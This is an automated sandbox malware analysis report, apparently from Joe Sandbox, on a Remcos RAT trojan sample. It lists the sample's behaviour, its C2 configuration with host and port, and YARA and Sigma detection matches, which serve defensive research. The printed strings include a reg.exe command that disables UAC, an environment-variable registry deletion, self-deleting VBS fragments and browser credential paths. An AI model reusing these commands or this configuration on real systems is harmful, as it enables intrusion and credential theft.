Windows Analysis Report g4E1F7Lc2O

Overview

General Information

Sample Name: g4E1F7Lc2O (renamed file extension from none to exe)
Analysis ID: 488339
MD5: 7274d6c1a7dc0a091e1a801165f879cd
SHA1: cc686677e1e22b71ef2b18559adb4c16aef11756
SHA256: 3b5a4b0fe5b8f4fd9bf24f32712e69da23b412a5653e0042d23a1d2429c42379
Tags: 32, exe, RemcosRAT, trojan

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Sigma detected: Suspicious Script Execution From Temp Folder
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
Sigma detected: WScript or CScript Dropper
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to steal Mail credentials (via file access)
Tries to steal Instant Messenger accounts or passwords
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • g4E1F7Lc2O.exe (PID: 7028 cmdline: 'C:\Users\user\Desktop\g4E1F7Lc2O.exe' MD5: 7274D6C1A7DC0A091E1A801165F879CD)
    • logagent.exe (PID: 3228 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • logagent.exe (PID: 7016 cmdline: C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\igawhodvxqh' MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • logagent.exe (PID: 5588 cmdline: C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\tifoigoxkyzdtxn' MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • logagent.exe (PID: 5628 cmdline: C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\vdtziqzqygridlbaiz' MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • wscript.exe (PID: 6492 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
    • cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6108 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1496 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 2792 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Bkmhwql.exe (PID: 4972 cmdline: 'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe' MD5: 7274D6C1A7DC0A091E1A801165F879CD)
    • DpiScaling.exe (PID: 5800 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
  • Bkmhwql.exe (PID: 6612 cmdline: 'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe' MD5: 7274D6C1A7DC0A091E1A801165F879CD)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.2.1 Pro", "Host:Port:Password": "trapboijiggy.dvrlists.com:54614:1", "Assigned name": "Octopus", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Octopus-GM39UT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

Source: C:\Users\Public\Libraries\lqwhmkB.url
  Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Author: @itsreallynick (Nick Carr), Strings:
    • 0x14:$file: URL=
    • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
  Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown, Strings:
    • 0x606a4:$str_a1: C:\Windows\System32\cmd.exe
    • 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x5f87c:$str_b2: Executing file:
    • 0x607e8:$str_b3: GetDirectListeningPort
    • 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x60268:$str_b7: \update.vbs
    • 0x5f8cc:$str_b9: Downloaded file:
    • 0x5f8b8:$str_b10: Downloading file:
    • 0x5f8a0:$str_b12: Failed to upload file:
    • 0x607b0:$str_b13: StartForward
    • 0x607d0:$str_b14: StopForward
    • 0x60210:$str_b15: fso.DeleteFile "
    • 0x601a4:$str_b16: On Error Resume Next
    • 0x60240:$str_b17: fso.DeleteFolder "
    • 0x5f890:$str_b18: Uploaded file:
    • 0x5f90c:$str_b19: Unable to delete:
    • 0x601d8:$str_b20: while fso.FileExists("
    • 0x5fd61:$str_c0: [Firefox StoredLogins not found]
Source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
  Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown, Strings:
      • 0x606a4:$str_a1: C:\Windows\System32\cmd.exe
      • 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x5f87c:$str_b2: Executing file:
      • 0x607e8:$str_b3: GetDirectListeningPort
      • 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x60268:$str_b7: \update.vbs
      • 0x5f8cc:$str_b9: Downloaded file:
      • 0x5f8b8:$str_b10: Downloading file:
      • 0x5f8a0:$str_b12: Failed to upload file:
      • 0x607b0:$str_b13: StartForward
      • 0x607d0:$str_b14: StopForward
      • 0x60210:$str_b15: fso.DeleteFile "
      • 0x601a4:$str_b16: On Error Resume Next
      • 0x60240:$str_b17: fso.DeleteFolder "
      • 0x5f890:$str_b18: Uploaded file:
      • 0x5f90c:$str_b19: Unable to delete:
      • 0x601d8:$str_b20: while fso.FileExists("
      • 0x5fd61:$str_c0: [Firefox StoredLogins not found]
Source: 00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmp
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security

Unpacked PEs

Source: 29.2.DpiScaling.exe.400000.0.unpack
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
  Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown, Strings:
          • 0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x5e67c:$str_b2: Executing file:
          • 0x5f5e8:$str_b3: GetDirectListeningPort
          • 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x5f068:$str_b7: \update.vbs
          • 0x5e6cc:$str_b9: Downloaded file:
          • 0x5e6b8:$str_b10: Downloading file:
          • 0x5e6a0:$str_b12: Failed to upload file:
          • 0x5f5b0:$str_b13: StartForward
          • 0x5f5d0:$str_b14: StopForward
          • 0x5f010:$str_b15: fso.DeleteFile "
          • 0x5efa4:$str_b16: On Error Resume Next
          • 0x5f040:$str_b17: fso.DeleteFolder "
          • 0x5e690:$str_b18: Uploaded file:
          • 0x5e70c:$str_b19: Unable to delete:
          • 0x5efd8:$str_b20: while fso.FileExists("
          • 0x5eb61:$str_c0: [Firefox StoredLogins not found]
Source: 7.2.logagent.exe.10590000.2.unpack
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
  Rule: REMCOS_RAT_variants, Description: unknown, Author: unknown, Strings:
            • 0x6022a:$str_a1: C:\Windows\System32\cmd.exe
            • 0x601a6:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x601a6:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x5f7ae:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x5fe06:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x5f402:$str_b2: Executing file:
            • 0x6036e:$str_b3: GetDirectListeningPort
            • 0x5fbc6:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x5fdee:$str_b7: \update.vbs
            • 0x5f452:$str_b9: Downloaded file:
            • 0x5f43e:$str_b10: Downloading file:
            • 0x5f426:$str_b12: Failed to upload file:
            • 0x60336:$str_b13: StartForward
            • 0x60356:$str_b14: StopForward
            • 0x5fd96:$str_b15: fso.DeleteFile "
            • 0x5fd2a:$str_b16: On Error Resume Next
            • 0x5fdc6:$str_b17: fso.DeleteFolder "
            • 0x5f416:$str_b18: Uploaded file:
            • 0x5f492:$str_b19: Unable to delete:
            • 0x5fd5e:$str_b20: while fso.FileExists("
            • 0x5f8e7:$str_c0: [Firefox StoredLogins not found]
Source: 29.2.DpiScaling.exe.400000.0.raw.unpack
  Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process started, Author: Florian Roth, Max Altgelt, Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\logagent.exe, ParentImage: C:\Windows\SysWOW64\logagent.exe, ParentProcessId: 3228, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , ProcessId: 6492
Sigma detected: WScript or CScript Dropper
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community, Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\logagent.exe, ParentImage: C:\Windows\SysWOW64\logagent.exe, ParentProcessId: 3228, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' , ProcessId: 6492

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, Malware Configuration Extractor: Remcos
Multi AV Scanner detection for submitted file
Source: g4E1F7Lc2O.exe, ReversingLabs: Detection: 20%
Yara detected Remcos RAT
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe, ReversingLabs: Detection: 20%
Machine Learning detection for sample
Source: g4E1F7Lc2O.exe, Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe, Joe Sandbox ML: detected
Source: 7.0.logagent.exe.10590000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.2.DpiScaling.exe.10590000.2.unpack, Avira: Label: TR/Dropper.Gen
Source: 7.0.logagent.exe.10590000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.DpiScaling.exe.10590000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.DpiScaling.exe.10590000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.DpiScaling.exe.10590000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.logagent.exe.10590000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.DpiScaling.exe.10590000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.logagent.exe.10590000.2.unpack, Avira: Label: TR/Dropper.Gen
Source: 7.0.logagent.exe.10590000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_0042E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_0042E5CA
Source: logagent.exe, Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: g4E1F7Lc2O.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: unknown, HTTPS traffic detected: 40.79.207.82:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.79.207.82:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.79.207.80:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040A012
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_004061C3 FindFirstFileW,FindNextFileW,7_2_004061C3
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040A22D
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_004153F5
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,7_2_00417754
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_004077EC
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 20_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407C87
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,7_2_0040697D

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: trapboijiggy.dvrlists.com
Source: global traffic, TCP traffic: 192.168.2.4:49757 -> 31.3.152.100:54614
Source: logagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: logagent.exe, String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: logagent.exe, String found in binary or memory: http://www.ebuddy.com
Source: logagent.exe, String found in binary or memory: http://www.imvu.com
Source: logagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: logagent.exe, 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: http://www.imvu.comr
Source: logagent.exe, logagent.exe, 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: http://www.nirsoft.net/
Source: logagent.exe, String found in binary or memory: https://www.google.com
Source: unknown, DNS traffic detected: queries for: onedrive.live.com
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_00422251 recv,7_2_00422251
Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,19_2_0040BA30

E-Banking Fraud:

Yara detected Remcos RAT

System Summary:

Malicious sample detected (through community Yara rule)
              Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: 7.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: 29.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: 29.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: 7.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: 7.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: 29.2.DpiScaling.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: 29.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: 7.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: 7.2.logagent.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: 7.2.logagent.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: C:\Users\Public\Libraries\lqwhmkB.url, type: DROPPED, Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers, author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Windows\SysWOW64\wscript.exe, File deleted: C:\Windows\SysWOW64\logagent.exe
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: String function: 0042F49E appears 37 times
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: String function: 00402084 appears 57 times
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: String function: 0042FB60 appears 34 times
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: String function: 00412968 appears 78 times
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: String function: 00421A32 appears 43 times
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: String function: 0044407A appears 37 times
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_0041412B CreateProcessW,CloseHandle,FindCloseChangeNotification,FindCloseChangeNotification,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,7_2_0041412B
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_00402CAC NtdllDefWindowProc_A,19_2_00402CAC
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_00402D66 NtdllDefWindowProc_A,19_2_00402D66
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 20_2_004016FC NtdllDefWindowProc_A,20_2_004016FC
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 20_2_004017B6 NtdllDefWindowProc_A,20_2_004017B6
              Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: scrobj.dll
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: g4E1F7Lc2O.exe, ReversingLabs: Detection: 20%
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, File read: C:\Users\user\Desktop\g4E1F7Lc2O.exe
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown, Process created: C:\Users\user\Desktop\g4E1F7Lc2O.exe 'C:\Users\user\Desktop\g4E1F7Lc2O.exe'
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: unknown, Process created: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe 'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe'
              Source: C:\Windows\SysWOW64\reg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\logagent.exe, Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\igawhodvxqh'
              Source: C:\Windows\SysWOW64\logagent.exe, Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\tifoigoxkyzdtxn'
              Source: C:\Windows\SysWOW64\logagent.exe, Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\vdtziqzqygridlbaiz'
              Source: unknown, Process created: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe 'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe'
              Source: C:\Windows\SysWOW64\logagent.exe, Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs'
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe, Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_00413958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_00413958
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,19_2_00410DE1
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Bkmhwqlbkulnphubkhqeoycsyqhknoi[1]
              Source: C:\Windows\SysWOW64\logagent.exe, File created: C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs
              Source: classification engine, Classification label: mal100.phis.troj.spyw.evad.winEXE@29/10@15/4
              Source: C:\Windows\SysWOW64\logagent.exe, File read: C:\Users\user\Desktop\desktop.ini
              Source: logagent.exe, Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
